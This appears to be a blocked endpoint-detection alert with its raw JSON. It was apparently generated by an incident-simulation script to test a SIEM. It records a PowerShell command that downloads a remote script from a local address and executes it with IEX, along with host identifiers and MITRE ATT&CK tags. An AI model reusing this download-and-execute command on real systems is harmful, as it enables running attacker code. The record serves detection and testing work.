High
Process Information
- File Name: cmd.exe
- File Path: \Device\HarddiskVolume3\Windows\System32\cmd.exe
- Command Line: C:\windows\system32\cmd.exe /c "powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/ps')""
- Process ID: 26992046078
- Parent PID: 26930287020
- SHA256: 64afc6db3aad1289533662e2d79e27dd55c7dcdb8cd918b08e145ad82ad5acb4 [VT]
- MD5: 6d109a3a00f210c1ab89c3b08399ed48
- Disposition: 2048 (Prevention, process was blocked from execution.)
Raw JSON Data
{
"metadata": {
"customerIDString": "84393bf974fd44bda943a25a6a7bc27f",
"offset": 157986,
"eventType": "EppDetectionSummaryEvent",
"eventCreationTime": 1766358143000,
"version": "1.0"
},
"event": {
"ProcessStartTime": 1766358082,
"ProcessEndTime": 0,
"ProcessId": 26992046078,
"ParentProcessId": 26930287020,
"Hostname": "BOOK-R0BE6S1NC3",
"UserName": "ubuntu",
"Name": "Attacker Methodology",
"Description": "A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line.",
"Severity": 70,
"SeverityName": "High",
"FileName": "cmd.exe",
"FilePath": "\\Device\\HarddiskVolume3\\Windows\\System32\\cmd.exe",
"CommandLine": "C:\\windows\\system32\\cmd.exe /c \u0022powershell -c \u0022IEX (New-Object Net.WebClient).DownloadString(\u0027http://127.0.0.1/ps\u0027)\u0022\u0022",
"SHA256String": "64afc6db3aad1289533662e2d79e27dd55c7dcdb8cd918b08e145ad82ad5acb4",
"MD5String": "6d109a3a00f210c1ab89c3b08399ed48",
"SHA1String": "0000000000000000000000000000000000000000",
"LogonDomain": "BOOK-R0BE6S1NC3",
"FalconHostLink": "https://falcon.us-2.crowdstrike.com/activity-v2/detections/84393bf974fd44bda943a25a6a7bc27f:ind:024efd237c2d4f87958607652cb04c8b:26992046078-10166-3706640?_cid=g04000x7oomvbbtvcerklzeap3llo7ue",
"AgentId": "024efd237c2d4f87958607652cb04c8b",
"IOCType": "hash_sha256",
"IOCValue": "64afc6db3aad1289533662e2d79e27dd55c7dcdb8cd918b08e145ad82ad5acb4",
"CompositeId": "84393bf974fd44bda943a25a6a7bc27f:ind:024efd237c2d4f87958607652cb04c8b:26992046078-10166-3706640",
"LocalIP": "172.27.1.19",
"MACAddress": "00-72-ee-3e-51-84",
"Tactic": "Execution",
"Technique": "PowerShell",
"Objective": "Follow Through",
"PatternDispositionDescription": "Prevention, process was blocked from execution.",
"PatternDispositionValue": 2048,
"PatternDispositionFlags": {
"Indicator": false,
"Detect": false,
"InddetMask": false,
"SensorOnly": false,
"Rooting": false,
"KillProcess": false,
"KillSubProcess": false,
"QuarantineMachine": false,
"QuarantineFile": false,
"PolicyDisabled": false,
"KillParent": false,
"OperationBlocked": false,
"ProcessBlocked": true,
"RegistryOperationBlocked": false,
"CriticalProcessDisabled": false,
"BootupSafeguardEnabled": false,
"FsOperationBlocked": false,
"HandleOperationDowngraded": false,
"KillActionFailed": false,
"BlockingUnsupportedOrDisabled": false,
"SuspendProcess": false,
"SuspendParent": false,
"ContainmentFileSystem": false
},
"ParentImageFileName": "python.exe",
"ParentCommandLine": "\u0022C:\\app\\cortex-xdr-siem-test\\.venv\\Scripts\\python.exe\u0022 mega_incident_generator.py --rounds 2 --interval 30 ",
"GrandParentImageFileName": "python.exe",
"GrandParentCommandLine": "\u0022C:\\app\\cortex-xdr-siem-test\\.venv\\Scripts\\python.exe\u0022 mega_incident_generator.py --rounds 2 --interval 30 ",
"HostGroups": "4f5aa5f1cdc6441982cf5c58e4b5d75a",
"AssociatedFile": "\\Device\\HarddiskVolume3\\Windows\\System32\\cmd.exe",
"PatternId": 10166,
"SourceVendors": "CrowdStrike",
"SourceProducts": "Falcon Insight",
"DataDomains": "Endpoint",
"AggregateId": "aggind:024efd237c2d4f87958607652cb04c8b:17576755488",
"Type": "ldt",
"ParentImageFilePath": "\\Device\\HarddiskVolume3\\Users\\ubuntu\\scoop\\apps\\python\\3.13.2\\python.exe",
"GrandParentImageFilePath": "\\Device\\HarddiskVolume3\\app\\cortex-xdr-siem-test\\.venv\\Scripts\\python.exe",
"LocalIPv6": "",
"PlatformId": "0",
"PlatformName": "Windows",
"MitreAttack": [
{
"Tactic": "Execution",
"TacticID": "TA0002",
"Technique": "PowerShell",
"TechniqueID": "T1059.001",
"PatternID": 10166
}
],
"CloudIndicator": false,
"RiskScore": 47
}
}